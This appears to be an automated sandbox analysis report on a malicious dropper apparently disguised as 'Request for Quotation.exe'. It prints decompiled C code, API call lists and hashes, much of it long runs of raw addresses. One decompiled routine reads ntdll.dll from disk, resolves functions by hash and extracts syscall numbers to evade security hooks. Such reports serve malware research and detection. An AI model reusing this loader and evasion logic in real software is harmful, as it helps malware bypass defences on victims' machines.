                                                                                0x6eee5591
                                                                                0x6eee559a
                                                                                0x6eee559b
                                                                                0x6eee55a4
                                                                                0x6eee55a5
                                                                                0x6eee55ae
                                                                                0x6eee55af
                                                                                0x6eee55b8
                                                                                0x6eee55b9
                                                                                0x6eee55c2
                                                                                0x6eee55c3
                                                                                0x6eee55cc
                                                                                0x6eee55cd
                                                                                0x6eee55d6
                                                                                0x6eee55d7
                                                                                0x6eee55e0
                                                                                0x6eee55e1
                                                                                0x6eee55ea
                                                                                0x6eee55eb
                                                                                0x6eee55f4
                                                                                0x6eee55f5
                                                                                0x6eee55fe
                                                                                0x6eee55ff
                                                                                0x6eee5608
                                                                                0x6eee5609
                                                                                0x6eee5612
                                                                                0x6eee5613
                                                                                0x6eee561c
                                                                                0x6eee561d
                                                                                0x6eee5626
                                                                                0x6eee5627
                                                                                0x6eee5630
                                                                                0x6eee5631
                                                                                0x6eee563a
                                                                                0x6eee563b
                                                                                0x6eee5644
                                                                                0x6eee5645
                                                                                0x6eee564e
                                                                                0x6eee564f
                                                                                0x6eee5658
                                                                                0x6eee5659
                                                                                0x6eee5662
                                                                                0x6eee5663
                                                                                0x6eee566c
                                                                                0x6eee566d
                                                                                0x6eee5676
                                                                                0x6eee5677
                                                                                0x6eee5680
                                                                                0x6eee5681
                                                                                0x6eee568a
                                                                                0x6eee568b
                                                                                0x6eee5694
                                                                                0x6eee5695
                                                                                0x6eee569e
                                                                                0x6eee569f
                                                                                0x6eee56a8
                                                                                0x6eee56a9
                                                                                0x6eee56b2
                                                                                0x6eee56b3
                                                                                0x6eee56bc
                                                                                0x6eee56bd
                                                                                0x6eee56c6
                                                                                0x6eee56c7
                                                                                0x6eee56d0
                                                                                0x6eee56d1
                                                                                0x6eee56da
                                                                                0x6eee56db
                                                                                0x6eee56e4
                                                                                0x6eee56e5
                                                                                0x6eee56ee
                                                                                0x6eee56ef
                                                                                0x6eee56f8
                                                                                0x6eee56f9
                                                                                0x6eee5702
                                                                                0x6eee5703
                                                                                0x6eee570c
                                                                                0x6eee570d
                                                                                0x6eee5716
                                                                                0x6eee5717
                                                                                0x6eee5720
                                                                                0x6eee5721
                                                                                0x6eee572a
                                                                                0x6eee572b
                                                                                0x6eee5734
                                                                                0x6eee5735
                                                                                0x6eee573e
                                                                                0x6eee573f
                                                                                0x6eee5748
                                                                                0x6eee5749
                                                                                0x6eee5752
                                                                                0x6eee5753
                                                                                0x6eee575c
                                                                                0x6eee575d
                                                                                0x6eee5766
                                                                                0x6eee5767
                                                                                0x6eee5770
                                                                                0x6eee5771
                                                                                0x6eee577a
                                                                                0x6eee577b
                                                                                0x6eee5784
                                                                                0x6eee5785
                                                                                0x6eee578e
                                                                                0x6eee578f
                                                                                0x6eee5798
                                                                                0x6eee5799
                                                                                0x6eee57a2
                                                                                0x6eee57a3
                                                                                0x6eee57ac
                                                                                0x6eee57ad
                                                                                0x6eee57b6
                                                                                0x6eee57b7
                                                                                0x6eee57c0
                                                                                0x6eee57c1
                                                                                0x6eee57ca
                                                                                0x6eee57cb
                                                                                0x6eee57d4
                                                                                0x6eee57d5
                                                                                0x6eee57de
                                                                                0x6eee57e7
                                                                                0x6eee57e8
                                                                                0x6eee57f1
                                                                                0x6eee57f2
                                                                                0x6eee57fb
                                                                                0x6eee57fc
                                                                                0x6eee5805
                                                                                0x6eee5806
                                                                                0x6eee580f
                                                                                0x6eee5810
                                                                                0x6eee5819
                                                                                0x6eee581a
                                                                                0x6eee5823
                                                                                0x6eee5824
                                                                                0x6eee582d
                                                                                0x6eee582e
                                                                                0x6eee5837
                                                                                0x6eee5838
                                                                                0x6eee5841
                                                                                0x6eee5842
                                                                                0x6eee584b
                                                                                0x6eee584c
                                                                                0x6eee5855
                                                                                0x6eee5856
                                                                                0x6eee585f
                                                                                0x6eee5860
                                                                                0x6eee5869
                                                                                0x6eee586a
                                                                                0x6eee5873
                                                                                0x6eee5874
                                                                                0x6eee587d
                                                                                0x6eee587e
                                                                                0x6eee5887
                                                                                0x6eee5888
                                                                                0x6eee5891
                                                                                0x6eee5892
                                                                                0x6eee589b
                                                                                0x6eee589c
                                                                                0x6eee58a5
                                                                                0x6eee58a6
                                                                                0x6eee58af
                                                                                0x6eee58b0
                                                                                0x6eee58b9
                                                                                0x6eee58ba
                                                                                0x6eee58c3
                                                                                0x6eee58c4
                                                                                0x6eee58cd
                                                                                0x6eee58ce
                                                                                0x6eee58d7
                                                                                0x6eee58d8
                                                                                0x6eee58e1
                                                                                0x6eee58e2
                                                                                0x6eee58eb
                                                                                0x6eee58ec
                                                                                0x6eee58f5
                                                                                0x6eee58f6
                                                                                0x6eee58ff
                                                                                0x6eee5900
                                                                                0x6eee5909
                                                                                0x6eee590a
                                                                                0x6eee5913
                                                                                0x6eee5914
                                                                                0x6eee591d
                                                                                0x6eee591e
                                                                                0x6eee5927
                                                                                0x6eee5928
                                                                                0x6eee5931
                                                                                0x6eee5932
                                                                                0x6eee593b
                                                                                0x6eee593c
                                                                                0x6eee5945
                                                                                0x6eee5946
                                                                                0x6eee594f
                                                                                0x6eee5950
                                                                                0x6eee5959
                                                                                0x6eee595a
                                                                                0x6eee5963
                                                                                0x6eee5964
                                                                                0x6eee596d
                                                                                0x6eee596e
                                                                                0x6eee5977
                                                                                0x6eee5978
                                                                                0x6eee5981
                                                                                0x6eee5982
                                                                                0x6eee598b
                                                                                0x6eee598c
                                                                                0x6eee5995
                                                                                0x6eee5996
                                                                                0x6eee599f
                                                                                0x6eee59a0
                                                                                0x6eee59a9
                                                                                0x6eee59aa
                                                                                0x6eee59b3
                                                                                0x6eee59b4
                                                                                0x6eee59bd
                                                                                0x6eee59be
                                                                                0x6eee59c7
                                                                                0x6eee59c8
                                                                                0x6eee59d1
                                                                                0x6eee59d2
                                                                                0x6eee59db
                                                                                0x6eee59dc
                                                                                0x6eee59e5
                                                                                0x6eee59e6
                                                                                0x6eee59ef
                                                                                0x6eee59f0
                                                                                0x6eee59f9
                                                                                0x6eee59fa
                                                                                0x6eee5a03
                                                                                0x6eee5a04
                                                                                0x6eee5a0d
                                                                                0x6eee5a0e
                                                                                0x6eee5a17
                                                                                0x6eee5a18
                                                                                0x6eee5a21
                                                                                0x6eee5a22
                                                                                0x6eee5a2b
                                                                                0x6eee5a2c
                                                                                0x6eee5a35
                                                                                0x6eee5a36
                                                                                0x6eee5a3f
                                                                                0x6eee5a40
                                                                                0x6eee5a49
                                                                                0x6eee5a4a
                                                                                0x6eee5a53
                                                                                0x6eee5a54
                                                                                0x6eee5a5d
                                                                                0x6eee5a5e
                                                                                0x6eee5a67
                                                                                0x6eee5a68
                                                                                0x6eee5a71
                                                                                0x6eee5a72
                                                                                0x6eee5a7b
                                                                                0x6eee5a7c
                                                                                0x6eee5a85
                                                                                0x6eee5a86
                                                                                0x6eee5a8f
                                                                                0x6eee5a90
                                                                                0x6eee5a99
                                                                                0x6eee5a9a
                                                                                0x6eee5aa3
                                                                                0x6eee5aa4
                                                                                0x6eee5aad
                                                                                0x6eee5aae
                                                                                0x6eee5ab7
                                                                                0x6eee5ab8
                                                                                0x6eee5ac1
                                                                                0x6eee5ac2
                                                                                0x6eee5acb
                                                                                0x6eee5acc
                                                                                0x6eee5ad5
                                                                                0x6eee5ad6
                                                                                0x6eee5adf
                                                                                0x6eee5ae0
                                                                                0x6eee5ae9
                                                                                0x6eee5aea
                                                                                0x6eee5af3
                                                                                0x6eee6389
                                                                                0x6eee638f
                                                                                0x6eee6392
                                                                                0x6eee6396
                                                                                0x6eee63af
                                                                                0x6eee63b5
                                                                                0x6eee63b7
                                                                                0x6eee63bd
                                                                                0x6eee63c4
                                                                                0x6eee63cc
                                                                                0x6eee63d1
                                                                                0x6eee63d3
                                                                                0x6eee63da
                                                                                0x6eee63e6
                                                                                0x6eee63f4
                                                                                0x6eee6421
                                                                                0x6eee6427
                                                                                0x6eee6429
                                                                                0x6eee642d
                                                                                0x6eee642d
                                                                                0x6eee6429
                                                                                0x6eee6432
                                                                                0x6eee6432
                                                                                0x00000000
                                                                                0x6eee63b7
                                                                                0x00000000
                                                                                0x6eee6396
                                                                                0x00000000
                                                                                0x6eee6376
                                                                                0x00000000
                                                                                0x6eee635d
                                                                                0x6eee62c6
                                                                                0x6eee62d1
                                                                                0x6eee62d6
                                                                                0x6eee62d8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee62dc
                                                                                0x6eee62e6
                                                                                0x6eee62eb
                                                                                0x6eee62ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee62f1
                                                                                0x6eee62fc
                                                                                0x6eee6301
                                                                                0x6eee6303
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 6EEE4211: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 6EEE4256
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6EEE6350
                                                                                  • Part of subcall function 6EEE4211: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 6EEE427A
                                                                                • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 6EEE6389
                                                                                  • Part of subcall function 6EEE4211: Process32NextW.KERNEL32(000000FF,0000022C), ref: 6EEE42A5
                                                                                • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 6EEE63AF
                                                                                • ExitProcess.KERNEL32(00000000), ref: 6EEE6432
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateFileProcess32$AllocExitFirstNextProcessReadSnapshotToolhelp32Virtual
                                                                                • String ID: c7708126811449509a4aa30ceb170932
                                                                                • API String ID: 1567874941-4047853548
                                                                                • Opcode ID: f65c6a2d9955ba9a8ed14ab7800063b9e242a2ebd9d48c2c394516932662dbbd
                                                                                • Instruction ID: 69c7331c60144f001272b3c480c21a53a2b7b94706d51d8efc62cc66bc25cd6d
                                                                                • Opcode Fuzzy Hash: f65c6a2d9955ba9a8ed14ab7800063b9e242a2ebd9d48c2c394516932662dbbd
                                                                                • Instruction Fuzzy Hash: 6723A815A94798A8E7B0CB94BC26BB963756F84B10F2054C7E60CEE1E1D3B51FD09F0A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 69%
                                                                                			E6EEE36FB(intOrPtr _a4) {
                                                                                				signed int _v8;
                                                                                				void* _v12;
                                                                                				void* _v16;
                                                                                				intOrPtr _v20;
                                                                                				void* _v24;
                                                                                				signed int _v28;
                                                                                				intOrPtr _v32;
                                                                                				signed int _v36;
                                                                                				intOrPtr _v40;
                                                                                				signed int _v44;
                                                                                				signed int _v48;
                                                                                				intOrPtr _v52;
                                                                                				intOrPtr _v56;
                                                                                				intOrPtr _v60;
                                                                                				intOrPtr _v64;
                                                                                				intOrPtr _v68;
                                                                                				intOrPtr _v72;
                                                                                				void* _v76;
                                                                                				intOrPtr _v80;
                                                                                				signed char _v84;
                                                                                				long _v88;
                                                                                				short _v90;
                                                                                				short _v92;
                                                                                				short _v94;
                                                                                				short _v96;
                                                                                				short _v98;
                                                                                				short _v100;
                                                                                				short _v102;
                                                                                				short _v104;
                                                                                				short _v106;
                                                                                				char _v108;
                                                                                				short _t141;
                                                                                				short _t142;
                                                                                				short _t143;
                                                                                				short _t144;
                                                                                				short _t145;
                                                                                				short _t146;
                                                                                				short _t147;
                                                                                				short _t148;
                                                                                				short _t149;
                                                                                				int _t165;
                                                                                				signed int _t169;
                                                                                				intOrPtr _t175;
                                                                                				signed int _t195;
                                                                                				signed int _t210;
                                                                                				signed int _t222;
                                                                                
                                                                                				_v24 = _v24 & 0x00000000;
                                                                                				_v48 = _v48 & 0x00000000;
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				_t141 = 0x6e;
                                                                                				_v108 = _t141;
                                                                                				_t142 = 0x74;
                                                                                				_v106 = _t142;
                                                                                				_t143 = 0x64;
                                                                                				_v104 = _t143;
                                                                                				_t144 = 0x6c;
                                                                                				_v102 = _t144;
                                                                                				_t145 = 0x6c;
                                                                                				_v100 = _t145;
                                                                                				_t146 = 0x2e;
                                                                                				_v98 = _t146;
                                                                                				_t147 = 0x64;
                                                                                				_v96 = _t147;
                                                                                				_t148 = 0x6c;
                                                                                				_v94 = _t148;
                                                                                				_t149 = 0x6c;
                                                                                				_v92 = _t149;
                                                                                				_v90 = 0;
                                                                                				_v16 = _v16 & 0x00000000;
                                                                                				_v12 = _v12 & 0x00000000;
                                                                                				_v36 = _v36 & 0x00000000;
                                                                                				_t23 =  &_v44;
                                                                                				 *_t23 = _v44 & 0x00000000;
                                                                                				_t222 =  *_t23;
                                                                                				_v20 = E6EEE6B57();
                                                                                				_v64 = E6EEE6BFF(_v20, 0x8a111d91);
                                                                                				_v68 = E6EEE6BFF(_v20, 0x170c1ca1);
                                                                                				_v52 = E6EEE6BFF(_v20, 0xa5f15738);
                                                                                				_v72 = E6EEE6BFF(_v20, 0x433a3842);
                                                                                				_v56 = E6EEE6BFF(_v20, 0xd6eb2188);
                                                                                				_v60 = E6EEE6BFF(_v20, 0x50a26af);
                                                                                				_v80 = E6EEE6BFF(_v20, 0x55e38b1f);
                                                                                				_v44 = 1;
                                                                                				while(1) {
                                                                                					_v16 = CreateFileW(E6EEE6E07(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                					if(_v16 == 0xffffffff) {
                                                                                						break;
                                                                                					}
                                                                                					_v36 = _v68(_v16, 0);
                                                                                					__eflags = _v36 - 0xffffffff;
                                                                                					if(_v36 != 0xffffffff) {
                                                                                						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
                                                                                						__eflags = _v12;
                                                                                						if(_v12 != 0) {
                                                                                							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
                                                                                							__eflags = _t165;
                                                                                							if(_t165 != 0) {
                                                                                								_v76 = _v12;
                                                                                								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
                                                                                								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
                                                                                								_t213 = _v32;
                                                                                								_t68 = _t169 + 0x18; // 0x8000018
                                                                                								_v40 = _v32 + _t68;
                                                                                								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
                                                                                								__eflags = _v24;
                                                                                								if(_v24 != 0) {
                                                                                									E6EEE6B6F(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
                                                                                									_v28 = _v28 & 0x00000000;
                                                                                									while(1) {
                                                                                										_t175 = _v32;
                                                                                										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
                                                                                										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
                                                                                											break;
                                                                                										}
                                                                                										E6EEE6B6F(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
                                                                                										_t210 = _v28 + 1;
                                                                                										__eflags = _t210;
                                                                                										_v28 = _t210;
                                                                                									}
                                                                                									_v48 = E6EEE6BFF(_v24, _a4);
                                                                                									__eflags = _v48;
                                                                                									if(_v48 != 0) {
                                                                                										__eflags = _v16;
                                                                                										if(_v16 != 0) {
                                                                                											FindCloseChangeNotification(_v16);
                                                                                										}
                                                                                										__eflags = _v12;
                                                                                										if(_v12 != 0) {
                                                                                											VirtualFree(_v12, 0, 0x8000);
                                                                                										}
                                                                                										_v44 = _v44 & 0x00000000;
                                                                                										__eflags = 0;
                                                                                										if(0 != 0) {
                                                                                											continue;
                                                                                										}
                                                                                									} else {
                                                                                									}
                                                                                								} else {
                                                                                								}
                                                                                							} else {
                                                                                							}
                                                                                						} else {
                                                                                						}
                                                                                					} else {
                                                                                					}
                                                                                					L22:
                                                                                					if(_v44 != 0) {
                                                                                						if(_v16 != 0) {
                                                                                							_v56(_v16);
                                                                                						}
                                                                                						_v80(0);
                                                                                					}
                                                                                					_v8 = _v48;
                                                                                					while(1 != 0) {
                                                                                						if(( *_v8 & 0x000000ff) != 0xb8) {
                                                                                							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
                                                                                							if(( *_v8 & 0x000000ff) != 0xe9) {
                                                                                								__eflags = ( *_v8 & 0x000000ff) - 0xea;
                                                                                								if(( *_v8 & 0x000000ff) != 0xea) {
                                                                                									_t195 = _v8 + 1;
                                                                                									__eflags = _t195;
                                                                                									_v8 = _t195;
                                                                                								} else {
                                                                                									_v8 =  *(_v8 + 1);
                                                                                								}
                                                                                							} else {
                                                                                								_t125 =  *(_v8 + 1) + 5; // 0x5
                                                                                								_v8 = _v8 + _t125;
                                                                                							}
                                                                                							continue;
                                                                                						} else {
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					_v8 = _v8 + 1;
                                                                                					_v84 =  *_v8;
                                                                                					if(_v24 != 0) {
                                                                                						VirtualFree(_v24, 0, 0x8000);
                                                                                					}
                                                                                					return _v84;
                                                                                				}
                                                                                				goto L22;
                                                                                			}

















































                                                                                0x6eee3850
                                                                                0x6eee3853
                                                                                0x6eee3855
                                                                                0x6eee385f
                                                                                0x6eee386b
                                                                                0x6eee3871
                                                                                0x6eee3875
                                                                                0x6eee3878
                                                                                0x6eee387c
                                                                                0x6eee3891
                                                                                0x6eee3894
                                                                                0x6eee3898
                                                                                0x6eee38ab
                                                                                0x6eee38b0
                                                                                0x6eee38bd
                                                                                0x6eee38bd
                                                                                0x6eee38c4
                                                                                0x6eee38c7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee38f2
                                                                                0x6eee38b9
                                                                                0x6eee38b9
                                                                                0x6eee38ba
                                                                                0x6eee38ba
                                                                                0x6eee3904
                                                                                0x6eee3907
                                                                                0x6eee390b
                                                                                0x6eee390f
                                                                                0x6eee3913
                                                                                0x6eee3918
                                                                                0x6eee3918
                                                                                0x6eee391b
                                                                                0x6eee391f
                                                                                0x6eee392b
                                                                                0x6eee392b
                                                                                0x6eee392e
                                                                                0x6eee3932
                                                                                0x6eee3934
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee390d
                                                                                0x00000000
                                                                                0x6eee389a
                                                                                0x00000000
                                                                                0x6eee3857
                                                                                0x00000000
                                                                                0x6eee383c
                                                                                0x00000000
                                                                                0x6eee381f
                                                                                0x6eee393a
                                                                                0x6eee393e
                                                                                0x6eee3944
                                                                                0x6eee3949
                                                                                0x6eee3949
                                                                                0x6eee394e
                                                                                0x6eee394e
                                                                                0x6eee3954
                                                                                0x6eee3957
                                                                                0x6eee3967
                                                                                0x6eee3971
                                                                                0x6eee3976
                                                                                0x6eee3990
                                                                                0x6eee3995
                                                                                0x6eee39a5
                                                                                0x6eee39a5
                                                                                0x6eee39a6
                                                                                0x6eee3997
                                                                                0x6eee399d
                                                                                0x6eee399d
                                                                                0x6eee3978
                                                                                0x6eee3981
                                                                                0x6eee3985
                                                                                0x6eee3985
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee3969
                                                                                0x00000000
                                                                                0x6eee3967
                                                                                0x6eee39af
                                                                                0x6eee39b7
                                                                                0x6eee39be
                                                                                0x6eee39ca
                                                                                0x6eee39ca
                                                                                0x6eee39d3
                                                                                0x6eee39d3
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 6EEE37FD
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 6EEE39CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 204039940-0
                                                                                • Opcode ID: c7d3fec17d3b7065f670a1136053afef20af325ec369ec726a101209f1611919
                                                                                • Instruction ID: c2e91a5fd4c1aac038827ce5a5026234c609d0a5f0115b146cff10eafb82b908
                                                                                • Opcode Fuzzy Hash: c7d3fec17d3b7065f670a1136053afef20af325ec369ec726a101209f1611919
                                                                                • Instruction Fuzzy Hash: 98A11570D2020AEFDF00CFE8D989BEDBBB5BF08319F208459E510BA6A4D3759A41DB15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040583A(CHAR* _a4) {
                                                                                				struct _SECURITY_ATTRIBUTES _v16;
                                                                                				struct _SECURITY_DESCRIPTOR _v36;
                                                                                				int _t22;
                                                                                				long _t23;
                                                                                
                                                                                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                				_v36.Owner = 0x408384;
                                                                                				_v36.Group = 0x408384;
                                                                                				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                				_v16.lpSecurityDescriptor =  &_v36;
                                                                                				_v36.Revision = 1;
                                                                                				_v36.Control = 4;
                                                                                				_v36.Dacl = 0x408374;
                                                                                				_v16.nLength = 0xc;
                                                                                				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                                                				if(_t22 != 0) {
                                                                                					L1:
                                                                                					return 0;
                                                                                				}
                                                                                				_t23 = GetLastError();
                                                                                				if(_t23 == 0xb7) {
                                                                                					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                                                						goto L1;
                                                                                					}
                                                                                					return GetLastError();
                                                                                				}
                                                                                				return _t23;
                                                                                			}








                                                                                APIs
                                                                                • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                • GetLastError.KERNEL32 ref: 00405891
                                                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
                                                                                • GetLastError.KERNEL32 ref: 004058B0
                                                                                Strings
                                                                                • C:\Users\user\Desktop, xrefs: 0040583A
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405860
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                • API String ID: 3449924974-2028306314
                                                                                • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                • Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
                                                                                • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                • Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004065E8(intOrPtr _a4) {
                                                                                				char _v292;
                                                                                				int _t10;
                                                                                				struct HINSTANCE__* _t14;
                                                                                				void* _t16;
                                                                                				void* _t21;
                                                                                
                                                                                				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                                				if(_t10 > 0x104) {
                                                                                					_t10 = 0;
                                                                                				}
                                                                                				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                                					_t16 = 1;
                                                                                				} else {
                                                                                					_t16 = 0;
                                                                                				}
                                                                                				_t5 = _t16 + 0x40a014; // 0x5c
                                                                                				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                                				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                                                				return _t14;
                                                                                			}









                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065FF
                                                                                • wsprintfA.USER32 ref: 00406638
                                                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                • String ID: %s%s.dll$UXTHEME$\
                                                                                • API String ID: 2200240437-4240819195
                                                                                • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                • Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
                                                                                • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                • Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                				char _t11;
                                                                                				signed int _t12;
                                                                                				int _t15;
                                                                                				signed int _t17;
                                                                                				void* _t20;
                                                                                				CHAR* _t21;
                                                                                
                                                                                				_t21 = _a4;
                                                                                				_t20 = 0x64;
                                                                                				while(1) {
                                                                                					_t11 =  *0x40a3ec; // 0x61736e
                                                                                					_t20 = _t20 - 1;
                                                                                					_a4 = _t11;
                                                                                					_t12 = GetTickCount();
                                                                                					_t17 = 0x1a;
                                                                                					_a6 = _a6 + _t12 % _t17;
                                                                                					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                                                					if(_t15 != 0) {
                                                                                						break;
                                                                                					}
                                                                                					if(_t20 != 0) {
                                                                                						continue;
                                                                                					}
                                                                                					 *_t21 =  *_t21 & 0x00000000;
                                                                                					return _t15;
                                                                                				}
                                                                                				return _t21;
                                                                                			}










                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00405E29
                                                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43
                                                                                Strings
                                                                                • nsa, xrefs: 00405E20
                                                                                • "C:\Users\user\Desktop\Request for Quotation.exe" , xrefs: 00405E15
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E18
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: "C:\Users\user\Desktop\Request for Quotation.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                • API String ID: 1716503409-2930191687
                                                                                • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
